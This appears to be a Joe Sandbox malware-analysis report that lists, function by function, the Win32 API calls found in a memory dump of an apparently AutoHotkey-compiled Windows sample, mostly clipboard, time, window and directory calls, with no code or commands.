GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426627, Relevance: 9.2, APIs: 6, Instructions: 168time

APIs

Part of subcall function 00435D90: GetClassNameA.USER32(00000000,00000101,00000101), ref: 00435DCA

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426606, Relevance: 9.2, APIs: 6, Instructions: 168time

APIs

Part of subcall function 00435B80: GetWindowTextLengthA.USER32(00000000), ref: 00435B9B
Part of subcall function 00435B80: GetWindowTextA.USER32(00000000,004ABB26,00000001), ref: 00435C17

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004266BD, Relevance: 9.2, APIs: 6, Instructions: 167time

APIs

Part of subcall function 00436CF0: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 00436D69
Part of subcall function 00436CF0: GetProcAddress.KERNEL32(00000000), ref: 00436D70
Part of subcall function 00436CF0: GetSystemMetrics.USER32(00000000), ref: 00436D9B
Part of subcall function 00436CF0: GetSystemMetrics.USER32(00000000), ref: 00436FA4
Part of subcall function 00436CF0: GetSystemMetrics.USER32(00000001), ref: 00436FAC
Part of subcall function 00436CF0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00436FBC

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427317, Relevance: 9.2, APIs: 6, Instructions: 167time

APIs

Part of subcall function 0043ED30: SetCurrentDirectoryA.KERNEL32(004987E9), ref: 0043ED3E
Part of subcall function 0043ED30: GetCurrentDirectoryA.KERNEL32(00000104,C:\Users\user\Desktop), ref: 0043ED7D
Part of subcall function 0043ED30: SetCurrentDirectoryA.KERNEL32(?), ref: 0043EDBA
Part of subcall function 0043ED30: GetCurrentDirectoryA.KERNEL32(00000104,C:\Users\user\Desktop), ref: 0043EDC6
Part of subcall function 0043ED30: _strncpy.LIBCMT ref: 0043EDD3

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00425BC1, Relevance: 9.2, APIs: 6, Instructions: 167time

APIs

Part of subcall function 0043C070: __Stoull.NTSTC_LIBCMT ref: 0043C220
Part of subcall function 0043C070: IsClipboardFormatAvailable.USER32(00000001), ref: 0043C823
Part of subcall function 0043C070: IsClipboardFormatAvailable.USER32(0000000F), ref: 0043C82B
Part of subcall function 0043C070: lstrcmpi.KERNEL32(?,00000000), ref: 0043C991
Part of subcall function 0043C070: IsClipboardFormatAvailable.USER32(00000001), ref: 0043CA72
Part of subcall function 0043C070: IsClipboardFormatAvailable.USER32(0000000F), ref: 0043CA7A

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426F6E, Relevance: 9.2, APIs: 6, Instructions: 167time

APIs

Part of subcall function 0043FC00: GetCPInfo.KERNEL32(000004E4,?,?,?,?,?,?,?,004987E9), ref: 0043FCEF
Part of subcall function 0043FC00: GetLastError.KERNEL32(0000030C,?,?,?,?,?,?,004987E9), ref: 0043FD39
Part of subcall function 0043FC00: GetTickCount.KERNEL32(?,0000FFFF,00000001,0000030C,?,?,?,?,?,?,004987E9), ref: 0043FDB1
Part of subcall function 0043FC00: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0043FDD8
Part of subcall function 0043FC00: GetTickCount.KERNEL32(?,?,?,?,?,?,004987E9), ref: 0043FDEE
Part of subcall function 0043FC00: GetLastError.KERNEL32(?,0000FFFF,00000001,0000030C,?,?,?,?,?,?,004987E9), ref: 0043FE14

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427466, Relevance: 9.2, APIs: 6, Instructions: 166time

APIs

Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.), ref: 0043931A
Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,?), ref: 004393D2
Part of subcall function 004392C0: IsWindowVisible.USER32(000601DA), ref: 004393DA
Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000005), ref: 004393F3
Part of subcall function 004392C0: IsIconic.USER32(000601DA), ref: 004393FC
Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000009), ref: 0043940E
Part of subcall function 004392C0: GetForegroundWindow.USER32 ref: 00439410
Part of subcall function 004392C0: SetForegroundWindow.USER32(000601DA), ref: 00439421
Part of subcall function 004392C0: SendMessageA.USER32(000801CA,000000B6,00000000,000F423F), ref: 0043944C

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004273CD, Relevance: 9.2, APIs: 6, Instructions: 166time

APIs

Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,Script info will not be shown because the "Menu, Tray, MainWindow"command option was not enabled in the original script.), ref: 0043931A
Part of subcall function 004392C0: SendMessageA.USER32(000801CA,0000000C,00000000,?), ref: 004393D2
Part of subcall function 004392C0: IsWindowVisible.USER32(000601DA), ref: 004393DA
Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000005), ref: 004393F3
Part of subcall function 004392C0: IsIconic.USER32(000601DA), ref: 004393FC
Part of subcall function 004392C0: ShowWindow.USER32(000601DA,00000009), ref: 0043940E
Part of subcall function 004392C0: GetForegroundWindow.USER32 ref: 00439410
Part of subcall function 004392C0: SetForegroundWindow.USER32(000601DA), ref: 00439421
Part of subcall function 004392C0: SendMessageA.USER32(000801CA,000000B6,00000000,000F423F), ref: 0043944C

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00427ED5, Relevance: 9.2, APIs: 6, Instructions: 166time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

